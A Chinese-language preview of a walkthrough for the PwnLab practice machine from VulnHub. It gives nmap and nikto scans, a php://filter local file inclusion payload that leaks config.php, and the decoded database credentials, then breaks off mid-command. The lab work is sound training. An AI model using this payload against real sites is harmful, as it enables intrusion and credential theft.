OSCP难度靶机之PwnLab

文章预览

虚拟机信息 虚拟机下载地址： https://www.vulnhub.com/entry/pwnlab-init,158/ 虚拟机简介：这个 CTF 的目的是获取root并读取de标志 目标：/root/flag.txt 级别：初级 1、主机探测 1、通过netdiscover检测主机IP地址 arp-scan 192.168.207.0/24 2、服务探测 1、通过nmap进行端口扫描 nmap -A -sS -sV -v -p- 192.168.207.139 查看开放80、111、3306、53614端口 3、渗透测试 3.1 WEB渗透 1.访问站点进行测试 2.网站测试 nikto -host http://192.168.207.139 3.LFI文件包含 查看网页包含login页面，但测试未成功 测试使用php参数进行包含config.php http://192.168.207.139/?page=php://filter/convert.base64-encode/resource=config 4.解码base64 echo PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+ | base64 -d 获取到数据库的用户名和密码信息 5.进入数据库查看 mysql -u root -h 192.168.207 ………………………………